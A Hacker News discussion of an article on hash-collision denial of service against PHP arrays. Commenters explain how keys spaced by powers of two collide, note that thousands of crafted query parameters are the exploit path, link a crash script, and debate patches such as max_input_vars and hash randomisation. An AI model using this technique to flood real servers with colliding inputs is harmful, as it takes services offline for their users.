

Supercolliding a PHP array (inserting 65536 elements takes 30 seconds) - nikic
http://nikic.github.com/2011/12/28/Supercolliding-a-PHP-array.html

======
saurik
I think the key thing to realize here is that when PHP says "array", they
apparently mean "ordered map": if you are allowed to have 'foo' as a key, it
is somewhat bothersome to call it an "array". Then, once you realize that it
is actually a hashtable, it is fairly obvious that there will be a worst-case
input set.

~~~
subwindow
Yes that is just one way in which PHP is annoying. I think they actually refer
to it as an "associative array", which as far as I can tell is exactly a hash,
but they never refer to it as one.

On a side note, Ruby does not appear to have that same problem as similar code
executes in .02 seconds. I think it is probably because Ruby's hash function
is superior.

~~~
dangrossman
Ruby's not immune to this...
<http://www.ocert.org/advisories/ocert-2011-003.html>

~~~
alinajaf
Well hold up a second... quote from that link:

_ In the case of the Ruby language, the 1.9.x branch is not affected by the
predictable collision condition since this version includes a randomization of
the hashing function._

So there is some merit to what the commenter is saying, though I doubt he knew
the above.

Actual ruby arrays (which are arrays and not hashes) will obviously not
exhibit this problem though.

I think for all practical purposes, unless you're doing something really
weird, the likelyhood of hash function collisions is rare enough that we don't
need to think too much about it.

~~~
damncabbage

      I think for all practical purposes, unless you're doing 
      something really weird, the likelyhood of hash function 
      collisions is rare enough that we don't need to think too 
      much about it.
    

Except that, like with PHP, the worrying part is that someone can stuff
rack.request.form_hash or rack.request.query_hash (a la PHP's $_POST and
$_GET).

(Unlike PHP, though, the Ruby community can head off these particular attacks
by releasing a new version of Rack, while waiting for a new 1.8.x release
containing a security patch.)

------
rufibarbatus
> _PHP already landed a change (which will ship with PHP 5.3.9) which will add
> a max_input_vars ini setting which defaults to 1000. This setting determines
> the maximum number of POST/GET variables that are accepted, so now only a
> maximum of 1000 collisions can be created._

Wait, where did we establish that less user input = less array insertions?

~~~
subwindow
I think the most obvious exploit path is using thousands of query parameters,
which are inserted into an "array" in PHP.

An ini setting seems like a terrible and incomplete fix to the problem.

~~~
maratd
> An ini setting seems like a terrible and incomplete fix to the problem.

Why? It solves the problem entirely.

~~~
subwindow
It only solves the exploit path, not the vulnerability.

The true issue is that their hashing algorithm sucks. Any patch that doesn't
fix the hashing algorithm is a band-aid and not a true fix.

~~~
nikic
It is somewhat risky to _fundamentally_ change the hashing algorithm late in
the release cycle (RC4). It is bound to cause problems. The ini-Option
prevents the obvious threat without doing deep changes to the core.

------
jamesmoss
If you're running a version of PHP which is patched with Suhosin
(<http://www.hardened-php.net/suhosin/>) you'll already be protected from the
DoS vector outlined in the article. By default Suhosin limits the max number
of $_GET/$_POST/$_COOKIE parameters to 200.

------
bluesnowmonkey
> _So if we insert a total of 64 elements, the first one 0, the second one 64,
> the third one 128, the fourth one 192, etc., all of those elements will have
> the same hash (namely 0) and all will be put into the same linked list._

This doesn't seem correct, or I'm missing something.

Upon the first insertion, PHP doesn't know that you intend to insert 63 more
elements. It shouldn't allocate a 2^6-element underlying array until it
exceeds 2^5 elements, right? So the first 2^5 insertions would be constant
time, and only the next 2^5 would be linear.

I'm not sure how PHP performs the reallocation to increase an array's
capacity. Maybe it allocates a blank array, and then inserts the existing
elements using the standard insertion algorithm. In that case 2^6 linear-time
insertions _would_ occur -- half during the reallocation, and half afterwords.
But it still bears mentioning that performance wouldn't tank until you
inserted half+1 of the values.

~~~
jgeralnik
It's not really an array, it's a hash table. When you insert an item it
doesn't simply put it in a previously allocated array, but places it at the
end of a linked list in the correct bucket determined by the hash. In order to
check if the key has already been used the list must be traversed each time,
and so insertion becomes a linear operation.

------
peteretep
Wait, what? Didn't we fix this in Perl forever (8 years) ago? Didn't everyone
else fix it at the same time?

[http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec...](http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/index.html)

How is any modern programming language still vulnerable to this?!

------
kmm
I could see lookup becoming slow but why is insertion affected? Isn't
insertion into a linked list a O(1) operation?

~~~
nikic
Even if the real C array contained a pointer to the last element in the LL
(which it does not, it only points to the first) it would still be worst-case
O(n): PHP has to check all elements in the LL to ensure that the element does
not exist yet.

Consider this:

    
    
        $foo = array();
        $foo['bar'] = 'x';
        $foo['bar'] = 'y';
    

In this case the second set of the 'bar' index modifies an existing element in
the linked list and is not appended as a new one.

~~~
kmm
Of course! I hadn't considered that inserting an element can mean updating an
already existing element.

In C you don't need a pointer to the last element though, you can just replace
the pointer to the first element with the new element and put the old pointer
in the "next" field of the new element. I usually implement stacks this way.

------
alastairpat
I just ran this (using the PHP CLI) on my Lion MacBook Air and it took far,
far longer than 30 seconds - 172, to be exact.

Not being at all familiar with the underlying mechanisms, does anybody
understand why it would take so much longer on {PHP 5.3.6, Lion, my MacBook
Air, the PHP CLI}?

~~~
nikic
Different hardware, different results. I ran my tests on a i3 CPU.

I don't know what a MacBook Air uses, but given that it's a notebook probably
something slower :)

~~~
sp332
I know it's hard to believe, the the low-end MBA has a Core i5 processor.
<https://www.apple.com/macbookair/features.html> Apple worked directly with
Intel to get a smaller "package", and soldered it to the mainboard to make it
fit.

------
damncabbage
From the article:

    
    
      But there is hope! PHP already landed a change (which 
      will ship with PHP 5.3.9) ...
    

As far as I can tell, this isn't being backported.

This is going to be bad. I've never had the privilege of using PHP 5.3 during
work hours; everything has always been stuck on 5.1.6 and 5.2.x.

Predictions:

a) People are going to jump to 5.3 in a hurry, or

b) RedHat will release a backport for RHEL (and Centos will release the patch
in six months).

Either way, I think this will go unpatched in a large number of systems until
DoS attacks become so common that a) and b) will need to happen.

~~~
nikic
I sure hope that a) is going to happen. PHP 5.2 is EOLed (i.e. no security
fixes) for something like a year now. PHP 5.1 even longer.

------
gog
Haven't tested it yet, but I believe that if you use suhosin patch you can
limit the number of variables with suhosin.get.max_vars and
suhosin.post.max_vars so you do not have to wait for php to the release the
version with the patch (I guess most of the people do not compile PHP from
Subversion trunk for production usage).

------
asadkn
Using string keys: [https://github.com/koto/blog-kotowicz-net-
examples/blob/mast...](https://github.com/koto/blog-kotowicz-net-
examples/blob/master/hashcollision/crash.php) (base 5?)

Didn't check in details yet but it might be interesting for the curious kind.

------
zerothehero
This is cool, can someone do the same for Python? (And other languages?)

~~~
Deestan
Yes. This is a trivial exploit of a _designed_ weakness in hashtables.

I shall, arrogant as I am, scoff at people who are surprised when this
happens. I mean, honestly, what kind of developer doesn't know the _basic
properties_ of their data structures?

~~~
mdwrigh2
Well, this isn't exploitable if you use a randomized hash function like Ruby
1.9 does.

See <http://www.ocert.org/advisories/ocert-2011-003.html> for a listing of
vulnerable languages (and yes, Python is on the list).

~~~
chc
You make it sound like you're somehow disagreeing with him, but what he says
is true even of Ruby's hash algorithm. Introducing randomness into the hash
function is really just a band-aid on this vulnerability. The inherent
vulnerability is there either way; you just need a bit of runtime information
to do the attack when runtime information is introduced into the hash
function.

------
Cyndre
Making a simple change of $size = pow(2, 16); to $size = 65535 removes the
issue entirely.

Inserting 65535 evil elements took 0.030333042144775 seconds Inserting 65535
good elements took 0.020994901657104 seconds

~~~
lambda
Yes, those are no longer values that will hit the worst-case performance here.

Did you read the article? The reason for the bad performance is that the way
that PHP hashes integers is just taking the integer mod the size of the hash
table. So for values which are 0 mod the size of the hash table, they will all
go into the same bucket. If your hash table has a size that's a power of 2,
then any sum of powers of two equal or larger than the size of the hash table
will hash to 0, and go into the same bucket. So if you insert a whole bunch of
values that increase by a large power of two, then they will all hash to 0 and
give you O(n^2) performance.

Note that the size referred to there is being use not only as the size of the
array, but also the amount to iterate by. By changing that to something other
than a power of 2, you are no longer inserting "evil" elements.

The point of this article is that it's really, really easy to do a denial of
service attack on PHP arrays by picking array indices that are large powers of
two. Of course you can fix the problem by not using large powers of two.

~~~
Cyndre
Very nice explanation. Thanks to you and a few others I now understand what is
happening far better :). Interesting, even at 256 it takes 10 times as long to
insert the evil elements.

Thanks again for helping me understand and learn something new today :)

